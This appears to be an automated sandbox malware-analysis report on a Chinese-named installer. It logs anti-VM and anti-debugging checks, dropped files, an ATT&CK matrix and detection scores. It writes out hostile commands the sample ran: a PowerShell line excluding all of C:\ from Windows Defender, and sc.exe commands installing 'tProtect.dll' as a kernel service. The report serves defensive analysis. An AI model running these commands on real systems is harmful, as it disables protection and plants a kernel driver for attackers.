Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6458	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3333	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Window / User API: threadDelayed 620	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Window / User API: threadDelayed 597	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SN9SA.tmp\update.vac	Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SN9SA.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-L8408.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-L8408.tmp\_isetup\_setup64.tmp	Jump to dropped file

Source: C:\Program Files (x86)\Windows NT\7zr.exe

API coverage: 7.6 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CC9AEC0 FindFirstFileA,FindClose,FindClose,		7_2_6CC9AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 11_2_00186868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,		11_2_00186868

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 11_2_00187496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

11_2_00187496

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 11_2_00189C60 GetSystemInfo,

11_2_00189C60

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to hide a thread from the debugger

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Code function: 7_2_6CB23886 NtSetInformationThread 00000000,00000011,00000000,00000000

7_2_6CB23886

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Code function: 7_2_6CCB0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_6CCB0181

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 11_2_002057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

11_2_002057D0

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCB9D66 mov eax, dword ptr fs:[00000030h]	7_2_6CCB9D66
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCB9D35 mov eax, dword ptr fs:[00000030h]	7_2_6CCB9D35
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCAF17D mov eax, dword ptr fs:[00000030h]	7_2_6CCAF17D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCA8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		7_2_6CCA8CBD
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Code function: 7_2_6CCB0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		7_2_6CCB0181

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"			Jump to behavior

Found driver which could be used to inject code into processes

Source: tProtect.dll.13.dr

Static PE information: Found potential injection code

Source: C:\Users\user\AppData\Local\Temp\is-2T7ET.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\is-05V1G.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmp

Code function: 7_2_6CD77700 cpuid

7_2_6CD77700

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 11_2_0018AB2A GetSystemTimeAsFileTime,

11_2_0018AB2A

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 11_2_00220090 GetVersion,

11_2_00220090

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Service Execution	1 DLL Side-Loading	1 Windows Service	1 Disable or Modify Tools	LSASS Memory	32 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	111 Process Injection	231 Virtualization/Sandbox Evasion	Security Account Manager	231 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	2 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	25 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
#U5b89#U88c5#U52a9#U624b1.0.1.exe	0%	ReversingLabs
#U5b89#U88c5#U52a9#U624b1.0.1.exe	7%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\Windows NT\7zr.exe	0%	ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll	9%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-L8408.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SN9SA.tmp\_isetup\_setup64.tmp	0%	ReversingLabs

Name	Source	Malicious	Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	#U5b89#U88c5#U52a9#U624b1.0.1.exe	false	high
https://www.remobjects.com/ps	#U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046446817.000000007F99B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2046093911.0000000003030000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000001.00000000.2047774569.0000000000A11000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000007.00000000.2140430410.0000000000D3D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.6.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.dr	false	high
